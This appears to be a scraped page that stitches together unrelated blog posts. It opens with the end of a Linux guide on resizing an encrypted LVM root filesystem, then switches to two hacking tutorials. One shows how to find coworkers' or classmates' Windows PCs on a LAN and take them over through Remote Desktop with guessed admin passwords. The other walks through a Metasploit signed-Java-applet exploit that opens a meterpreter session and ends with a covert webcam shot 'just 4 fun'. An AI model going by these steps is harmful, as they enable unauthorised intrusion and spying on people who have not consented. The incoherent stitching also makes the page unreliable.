Using lvextend I was able to use the full free space for my root partition as I had originally intended. The filesystem used for my root partition is ext4. In order for this already existing filesystem to see the available space I had to expand the filesystem as well.

I was able to do this, after resizing the logical volume above, with the following.

resize2fs /dev/mapper/vg-root

Keep in mind I did this from my livecd so the filesystem was not mounted during these operations. I’ve read that ext4 can be resized during runtime however I prefer not to chance potential filesystem corruption.

Once this was done I just rebooted and verified that my root partition was as large as it should be. All was good.

Final notes on full disk encryption

Other notes are that this is not entirely full disk encryption. The boot partition is obviously left unencrypted. If you truly want your entire disk to be encrypted you would have to perform the same operations but for all things involving the /boot partition you would use a USB drive of some kind. You will need this USB disk to boot your system. This offers more protection but managing a physical item is overkill for me. I just want to mention it in case someone is interested in doing this.

Now your root and swap partitions are fully encrypted at rest! Once your system is on however the disk is obviously unencrypted so disk encryption is only really useful “at rest”. This means if you shut down your system your content is safe. However once you boot up your filesystem is available if you are, say, nabbed while your system is on. In addition to this your crypto key is in memory at a probably known location (cryptsetup/dm-crypt are open source afterall). Its unlikely you will be in a scenario where this matters as only feds and those with some fun tools can make use of this information. I just want to be complete with this article so you are more aware. Knowing the ins and outs of security is very important.

That said, enjoy!

How To Hack Windows Computers That Are On The Same LAN Network

How To Hack Same LAN Computers?

If you are working in Office / Colleges and want to hack your friends & college mate PC then here is a trick follow below steps:

Go to Run> Cmd

now type command

C:\>net view

Server Name            Remark

Here you can get all the names of all the computers machine names which connect with your LAN.

Now you got the name.  Lets start hacking into the systems.

After you get server name now type tracert command for knowing IP of the victim machine.

Example: C:\> tracert xyz

Here you get the IP address of the XYZ computer machine.

now go to windows start button and type Remote Desktop Connection

After click on Remote Desktop Connection you get below..

Now type the IP address or computer name of victim machine.
Click on connect <-|
It will also ask administrator password which is common as usual you known about.
After few second Victim machine shown in your Computer..
Now you can access that machine to open website, files, Software’s, etc
Enjoy the trick..

How to Hack Windows in 5 minutes


Readers, this article everybody would be going to understand techniques to exploit the operating system Microsoft Windows 8 (only for teaching purposes, for network administrators and security specialists understand how the mind works and to prevent the attacker). Through the Metasploit will learn how to hack some machines with Windows OS vulnerable, Windows 7 SP1 other OS is also applicable.


This exploit works “using Java Signed Applet Method” on any browser, but requires the java plugin installed, a file is created. “Jar”, it is necessary that the target open a URL and allow the java applet to run in the browser. The applet is presented to the target through a web page. The Java Virtual Machine, of the victim will pop up a window asking if they trust the signed applet, after the victim clicks on “run” the applet is run with full permissions.

Requirements for pentest:

  1. You must have installed the Windows 8 operating system.
  2. Some target computer or VMware (Virtual Machine) with a Linux distribution, can be Backtrack or Kali, whatever, the important thing is to have the “metasploit” up and running.

First reader, you need to open the terminal and enter the command:


Figure 1) Open metasploit.
After, we choose the exploit to use:

Let’s type use exploit/multi/browser/java_signed_applet .

Press enter and type “Show options”.

Figure 2) Use exploit and show options.

Essential concepts:

The SRVHOST and SRVPORT have defined default values ​​ and 8080. The SRVHOST is the IP address that the server will work to make the connection url to be opened by the target browser. SRVHOST is set to, the target must be able to connect to this machine using your public ip.

Figure 3) Set payload.
The LHOST should be the IP address that the victim is connected.

Figure 4) LHOST and exploit.

When the target open this link on your browser displays a warning in a dialog box .

A window will open, and the victim can check the “I accept the risk and want to run this application”, click “Run”.

Figure 5) Java applet.


Therefore, after the victim open the malicious URL, then click Run, Metasploit will start a meterpreter session to the target machine, and you get full access!

You can directly run “sessions l” to see the active sessions.
Example: sessions-i 1, where 1 is the ID of the session.

The applet is able to connect to Metasploit.

Meterpreter session starts and is ready, as planned, and available options for you to exploit the system.

Figure 6) Session starts.

This article is only for ethical hacking, now you can have fun with the commands.

Figure 7) Webcam shot: Just 4 fun.